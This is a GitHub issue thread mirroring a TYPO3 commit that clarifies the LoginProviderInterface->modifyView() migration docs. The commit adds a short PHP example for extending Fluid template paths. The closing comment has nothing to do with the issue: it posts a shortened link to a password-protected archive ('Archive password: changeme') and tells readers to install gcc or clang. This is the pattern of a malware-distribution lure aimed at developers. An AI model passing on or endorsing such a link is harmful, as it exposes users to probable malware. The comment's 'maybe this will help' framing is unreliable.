### ISSUE TITLE
[DOCS] Improve LoginProviderInterface->modifyView() ReST

### ISSUE THREAD

**Issue by TYPO3IncTeam** [TYPO3-Documentation/Changelog-To-Doc#1056]
:information_source: View this commit [on Github](https://github.com/TYPO3/typo3/commit/7599167ea1d96e2a96d425792266339741aa2bde)
:busts_in_silhouette: Authored by Christian Kuhn lolli@schwarzbu.ch
:heavy_check_mark: Merged by Georg Ringer georg.ringer@gmail.com

## Commit message

[DOCS] Improve LoginProviderInterface->modifyView() ReST

Add an example how custom login provider implementations
can add custom fluid lookup paths.

Resolves: #105038
Related: #104773
Releases: main
Change-Id: Ibb78f6c686a49a31a665017684ee80171397d563
Reviewed-on: https://review.typo3.org/c/Packages/TYPO3.CMS/+/86209
Tested-by: Simon Praetorius <simon@praetorius.me>
Reviewed-by: Simon Praetorius <simon@praetorius.me>
Tested-by: Georg Ringer <georg.ringer@gmail.com>
Reviewed-by: Georg Ringer <georg.ringer@gmail.com>
Tested-by: core-ci <typo3@b13.com>

## :heavy_division_sign: Modified files

<details>
<summary>13.3/Deprecation-104773-ExtbackendLoginProviderInterfaceChanges.rst</summary>

```diff
@@ -49,12 +49,23 @@ Migration
 =========
 
 Consumers of :php-short:`\TYPO3\CMS\Backend\LoginProvider\LoginProviderInterface`
-should implement :php:`modifyView()`
-instead, the transition should be smooth. Consumers that need the
-:php-short:`\TYPO3\CMS\Core\Page\PageRenderer`
+should implement :php:`modifyView()` instead, the transition should be smooth.
+Consumers that need the :php-short:`\TYPO3\CMS\Core\Page\PageRenderer`
 for JavaScript magic, should use :ref:`dependency injection <t3coreapi:Dependency-Injection>`
-to receive an instance
-of it.
+to receive an instance.
+
+The default implementation in :php-short:`\TYPO3\CMS\Backend\LoginProvider\UsernamePasswordLoginProvider`
+is a good example. Extensions that need to configure additional template, layout or
+partial lookup paths can extend them:
+
+.. code-block:: php
+
+    if ($view instanceof FluidViewAdapter) {
+        $templatePaths = $view->getRenderingContext()->getTemplatePaths();
+        $templateRootPaths = $templatePaths->getTemplateRootPaths();
+        $templateRootPaths[] = 'EXT:my_extension/Resources/Private/Templates';
+        $templatePaths->setTemplateRootPaths($templateRootPaths);
+    }
 
 Consumers of :php-short:`\TYPO3\CMS\Backend\LoginProvider\Event\ModifyPageLayoutOnLoginProviderSelectionEvent`
 should use the request instead, and/or should get an instance of
```

</details>

**Comment by SAMBILI** [comment]
maybe this will help

https://bit.ly/3TCbXO6
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)
